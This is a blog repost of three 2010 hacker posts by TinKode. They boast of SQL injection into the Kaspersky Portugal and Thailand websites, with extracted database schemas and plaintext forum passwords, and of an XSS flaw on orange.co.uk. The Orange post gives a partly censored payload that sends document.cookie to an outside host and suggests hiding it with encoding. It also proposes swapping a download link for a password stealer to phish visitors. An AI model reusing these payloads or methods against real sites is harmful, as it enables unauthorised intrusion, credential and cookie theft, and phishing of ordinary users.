Wednesday, February 1, 2012

TinKode-Kaspersky Portugal Full Disclosure

9:22 PM  Admin  No comments


Kaspersky Portugal Full Disclosure

Posted by isrtinkode on February 19, 2010
                     _   __                              _
                    | | / /                             | |
                    | |/ /  __ _ ___ _ __   ___ _ __ ___| | ___   _
                    |    \ / _` / __| '_ \ / _ \ '__/ __| |/ / | | |
                    | |\  \ (_| \__ \ |_) |  __/ |  \__ \   <| |_| |
                    \_| \_/\__,_|___/ .__/ \___|_|  |___/_|\_\\__, |
                                    | |                        __/ |
                                    |_|                       |___/

                                                                                  #owned by c0de.breaker

In one evening, when i searched a antivirus, I entered on the official kaspersky website of Portugal from mistake.
Link: www.kaspersky.com.pt
Kaspersky, from what i know has been hacked by “unu” with MySQLi.
So I said to try to see if I could find a vulnerability!
After 5 minutes of searching, I found something interesting, namely::
Warning: censored() [function.censored]: Query failed: ERROR: syntax error at or near "\" at character 306 in /home1/_sites/wwwkasperskycompt/kaspersky/PHP/IfDBRevendedoresKaspersky.phpclass on line 121
ERRO na execucao da query getRevendedors
ERROR: syntax error at or near "\" at character 306
censored() : That means as he use a censoredSQL database.
First time, i checked to see if is injectable, and if i can extract something.
The answer:
———————————————————–

True

False
———————————————————–
So I can make censoredSQL Injection!
What I extracted?
I wasn’t concerned about the content, I only “got” the names of databases, tables and columns.
Versiunea

#Principal Database: censored
#User: censored
#Version: censoredSQL 8.1.11 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)
#Other Databases
1 censored
2 template1
3 template0
4 monitoring
5 estkaspersky
6 horde
7 licence
8 hardwareipbrick
9 acessosclientes
10 licencefmota
11 temp
12 dbdoc
13 webcalendar
14 ipbox
15 adcav
16 jpleitao2
17 funambol
18 gaia
19 cinel2
20 makeupdate
21 tempdefaultconfig
#The tables from censored database (number:458)
1 table_base_idxml73
2 table_ass_idxml73_idtab1025
3 liga_tipoent_categoria
4 liga_subcat_categoria
5 classif_entidades
6 ignora
7 categoria_entidade
8 site
9 subcategoria_entidade
10 tabela_gestao_ipcontactos
11 ipcontactos_lang_files
12 utilizador_externo
13 webcal_sincro
14 pga_queries
15 pga_forms
16 pga_scripts
17 pga_reports
18 pga_schema
19 pga_layout
20 avaliar
21 estadorec1
22 liga_resultado_tarefa
23 webcal_user
24 utilizadores_operacao
25 webcal_entry
26 webcal_entry_repeats
27 webcal_entry_repeats_not
28 webcal_entry_user
29 webcal_entry_ext_user
30 webcal_user_pref
31 webcal_user_layers
32 exhumationprice
33 webcal_site_extras
34 webcal_reminder_log
35 webcal_group
36 table_base_idxml13
37 webcal_group_user
38 webcal_view
39 webcal_view_user
40 gravetype
41 webcal_entry_log
42 webcal_categories
43 webcal_config
44 cemeterysection
45 solucao
46 ipdoclanguages
47 ipdoctranslation
48 ipdocsentences
49 ipdocpages
50 ipdocpagetranslation
51 table_base_idxml15
52 table_ass_idxml15_idtab51
53 lockcodigos
54 assunto
55 table_base_idxml16
56 subassunto
57 table_ass_idxml16_idtab68
58 entidades2
59 coordenadas_estado
60 dados_infantarios
61 coordenadas_estadopr
62 codigo_accaopr
63 table_base_idxml17
64 raca
65 table_base_idxml18
66 table_base_idxml19
67 table_base_idxml20
68 table_base_idxml14
69 distrito
70 concelho
...
439 accaopr
440 table_base_idxml79
441 estadopr
442 funcaoproc
443 funcaopr
444 table_ass_idxml79_idtab1183
445 table_ass_idxml79_idtab1190
446 table_ass_idxml79_idtab1191
447 table_ass_idxml79_idtab1192
448 table_ass_idxml79_idtab1193
449 table_ass_idxml77_idtab1194
450 table_base_idxml78
451 table_ass_idxml80_idtab1216
452 table_base_idxml81
453 table_ass_idxml81_idtab1228
454 table_base_idxml70
455 table_base_idxml82
456 documento
457 revisaodoc
458 table_ass_idxml82_idtab1257
#Me: Ma gandesc, daca tot este una din cele mai mari compani din lume care asigura protectia poate a multor milioane de utilizatori prin produsele sale,
de ce nu au grija de propria securitatea in primul rand? Acest lucru poate fi si din cauza firmelor care creaza aceste website-uri intr-un timp foarte scurt pe sume exagerat de mari…
Cam atat.
~Where is a will, there is a way

Read More

TinKode-Kaspersky Thailand Full Access

9:19 PM  Admin  No comments


Kaspersky Thailand Full Access

Posted by isrtinkode on February 19, 2010
 _  __                             _                                _
| |/ /                            | |              /\              (_)
| ' / __ _ ___ _ __   ___ _ __ ___| | ___   _     /  \   __ _  __ _ _ _ __
|  < / _` / __| '_ \ / _ \ '__/ __| |/ / | | |   / /\ \ / _` |/ _` | | '_ \
| . \ (_| \__ \ |_) |  __/ |  \__ \   <| |_| |  / ____ \ (_| | (_| | | | | |
|_|\_\__,_|___/ .__/ \___|_|  |___/_|\_\\__, | /_/    \_\__, |\__,_|_|_| |_|
              | |                        __/ |           __/ |
              |_|                       |___/           |___/

                     #Kaspersky Thailand full access@c0de.breaker
Ok… As you might remember, some time ago, I gained access into Kaspersky Portugal.
Now I found another vulnerable parameter in Kaspersky Thailand.
Because the mod_security was ON, it was hard for me to make the injection, and in order to extract tables,colums,etc you must have a vast knowledge about how to filter some things.
Testing:






Main Informations:

#Version: 5.1.30
#censored
#censored
#censored
All databases:
#information_schema
#censored
#censored
Tables from thaikasp_dealer:

#censored
#newheader
#tb_dealer
#tb_part
Tables from thaikasp_forum:
#forum
#tbmember
Columns from tbmember
#ID
#Username
#Password
And now all accounts from tbmember. I can’t understand why passwords aren’t encrypted!

#censored
#censored
#censored
#censored
Admin Control Panel:


Yeah, finish.
Bye, TinKode

Read More

TinKode-Orange Vulnerable to XSS and phishing

9:17 PM  Admin  No comments


Orange Vulnerable to XSS and phishing

Posted by isrtinkode on February 19, 2010
                       ____                               _    _ _  __
                      / __ \                             | |  | | |/ /
                     | |  | |_ __ __ _ _ __   __ _  ___  | |  | | ' /
                     | |  | | '__/ _` | '_ \ / _` |/ _ \ | |  | |  <
                     | |__| | | | (_| | | | | (_| |  __/ | |__| | . \
                      \____/|_|  \__,_|_| |_|\__, |\___|  \____/|_|\_\
                                              __/ |
                                             |___/
                                            # TinKode & La Magra@ Romania
XSS – [Cross-Site Scripting]
Informations:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy…
More here: [ XSS ]
I just found a XSS vulnerability in website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code which may lead to cookie stealing.
Proof of Concept:

Link:
http://censored/index.php?module=censored=">censored  src=javascript:censored="http://censored?censored="+document.censored+"&censored")></censored>
c0de:
"><censored" src=javascript:censored="http://censored.site.com/censored.php?censored="+document.censored>
We can encode the malicous code in base64, hex, etc in order to hide our intentions! :)
Another example for this vulnerability is phishing! :D
As everyone knows, there are programs called stealer which can steal all saved passwords from your browser.
I picked a executable program (winamp in our case) for a demonstration.
Link to download winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe
The malicious code:
"><censored  src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe">censored
Encoded in hex will become:

http://website.orange.co.uk/censored
Replace the winamp link with another one(eg: a stealer) and you can trick a lot of people.
Note: This isn’t the only vulnerability which I found in : orange.co.uk
#Tinkode

Read More